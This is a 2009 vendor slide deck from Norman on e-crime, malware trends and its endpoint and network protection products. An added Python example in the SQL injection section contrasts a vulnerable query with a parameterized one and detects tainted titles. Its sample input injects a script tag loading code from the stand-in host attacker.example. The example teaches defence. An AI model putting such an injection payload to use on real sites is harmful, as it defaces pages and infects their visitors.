The threat landscape 2009 (and some solutions) Øivind Barbo, Corp. Prod. Marketing Manager, 2/8/2009
The market
FBI: e-crime now bigger than narcotics*
- 2008 was the year in which more malware was produced than legitimate applications
- Big business driven by profit
- Innovation to capture new markets (victims)
- Custom-designed malware: $250
- Personal information: $5
- Credit card: 2-5% of credit limit
- Russian malware writers can make $10,000 a day
* U.S. Government Accountability Office, Cybercrime: Public and Private Entities Face Challenges in Addressing Cyber Threats, June 2007.
Evolution of malware used in e-crime
Attacks and defenses across the enterprise web stack (slide diagram)
Tiers: The Internet | Web Server | Application Server | Databases | Backend Server | The Enterprise
Attacks: DoS, known web server vulnerabilities, parameter tampering, cross-site scripting, port scanning, pattern-based attacks, SQL injection, cookie poisoning
Defenses: access control and firewall, IDS/IPS, application firewall, antispoofing, user identification, encrypted transport of data, universal threat management, anomaly detection, intrusion prevention, vulnerability management, remediation/patching, compliance and risk management, host protection (server and desktop), layer 4-7 protection (content, URL, web), content control, data leakage management
Threat picture (Norman)
- Areas: people, technology
- Malware: Trojan horse, virus, spyware, botnets, spam
- Enemy: attackers, criminals, terrorists, foreign states
- Means: tools, methods, social engineering, social manipulation, vulnerabilities, security holes
- Target: money, information
How infections happen
- Web access, on all types of sites
- Attachments are becoming less common
- Exploits that cause browsers to automatically download and execute files
- Web sites infected through SQL injection attacks
SQL injection
Malicious text is injected into web pages by entering malformed statements into web forms, confusing the database behind the web site. Many websites are vulnerable. Used for inserting links to malicious websites into otherwise innocent web pages. Pages often end up half-corrupted, with links in strange places such as title fields.
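As an added example (not from the original deck), the concatenated query the slide describes beside its parameterized replacement, plus a check for the "links in title fields" symptom the slide mentions. The table, the injected input and the attacker.example host are constructed for illustration.

```python
import re
import sqlite3

# Constructed sample: a tiny table of CMS page titles (not from the original deck).
def build_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO pages (title) VALUES (?)",
                   [("Home",), ("Contact",), ("News",)])
    return db

def rename_vulnerable(db, page_id, new_title):
    # Form input pasted straight into the statement: a quote in the input ends the
    # string literal and whatever follows it is run as SQL.
    db.execute(f"UPDATE pages SET title = '{new_title}' WHERE id = {int(page_id)}")
    db.commit()

def rename_hardened(db, page_id, new_title):
    # Parameterized query: the driver passes the input as data, never as SQL,
    # so quotes and keywords in it stay inside the stored value.
    db.execute("UPDATE pages SET title = ? WHERE id = ?", (new_title, page_id))
    db.commit()

# Heuristic for the "links in strange places" symptom: a page title that
# carries markup or a URL is not something a content editor typed in.
SUSPICIOUS = re.compile(r"<script|<iframe|href=|https?://", re.IGNORECASE)

def suspicious_titles(db):
    return [(i, t) for i, t in db.execute("SELECT id, title FROM pages")
            if SUSPICIOUS.search(t or "")]

def titles(db):
    return [t for (t,) in db.execute("SELECT title FROM pages ORDER BY id")]

# Constructed input in the style of the 2008 mass defacements: the quote closes
# the title, "WHERE 1=1" widens the update to every row, "--" comments out the rest.
INJECTED = '<script src="http://attacker.example/x.js"></script>\' WHERE 1=1 --'

if __name__ == "__main__":
    db = build_db()
    rename_vulnerable(db, 1, INJECTED)
    print(titles(db))             # all three titles now carry the script tag
    print(suspicious_titles(db))  # all three rows flagged
    db = build_db()
    rename_hardened(db, 1, INJECTED)
    print(titles(db))             # only page 1 changed, input stored literally
    print(suspicious_titles(db))  # row 1 flagged: the stored text is still suspect
```

The heuristic flags the hardened case too, which is intended: parameterization stops the statement from being rewritten, while the content check catches a defaced or suspicious value that did get stored.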
In the press
Targeted attacks: MONEY
Norman signature database: 250% growth in 1 year (despite the focus on generic signatures)
Antivirus protection
- Clients
- File servers
- Web servers
- Mail servers
- Other servers
- Network: real-time scanning of the most used protocols, spam filtering
Norman Endpoint Manager A completely new application for managing Norman Endpoint Protection in network installations
Norman Endpoint Manager
- Easy to use
- Easy to manage clients
- Uses few system resources
- Quick overview of network status
- AV rollout/upgrade
- Unique network discovery
- Finds ALL devices in the network, regardless of type
NEM overview
- NEM controls updates
- NEM controls policies
- NEM controls the cleaning process
- NEM controls delta values (number of nodes with alarms/errors/warnings)
- Who controls NEM?
Integration with SiteScope
Integration with BAC
Integration development
UCMDB integration (slide diagram)
Business Technology Optimization: configuration management, data center consolidation, what-if analysis, policy compliance
Application modeling: custom apps, J2EE, SAP, Siebel, Oracle E-Business, DB, OS/NT
Universal CMDB with discovery of: switches/routers, CRM/ERP, servers, files, databases, applications, other
Malware spread vector: widely used ports (CIFS/SMB, RPC)
Norman Network Protection (slide diagram: data flow between the protected network, another network and the administrator; the appliance itself has no IP address)
- Transparent in the network
- Scans inbound and outbound traffic
- Minimal latency
- Scans internal (CIFS/SMB) and external (HTTP/FTP/POP...) protocols
- Keeps the network and network devices clean
- Isolates infected sources
- Preserves uptime and availability
Norman Network Protection in the network
Scan preferences per protocol
Traffic overview and statistics
Detailed overview of:
- Protocol types
- Most active IP addresses
- Traffic histogram per day, month or custom period
- Reverse DNS lookup
- Log file can be downloaded
Incident statistics
Blocked URLs
Incident log and sandbox analysis
Malware is quarantined, and a SandBox malware analysis gives a complete in-depth analysis of its potential behaviour.
NNP hardware, or e.g. HP DL360/380. NNP is a software product.
Avoid infections
- User training (MSN, unknown pop-ups, e-mail, etc.)
- Patch management
- Anti-virus management: activated according to policies, up-to-date definition files
- Discovery of unknown nodes in the network
- Alerts
- Network traffic content scanning
The most dangerous threat..
email: oba@norman.com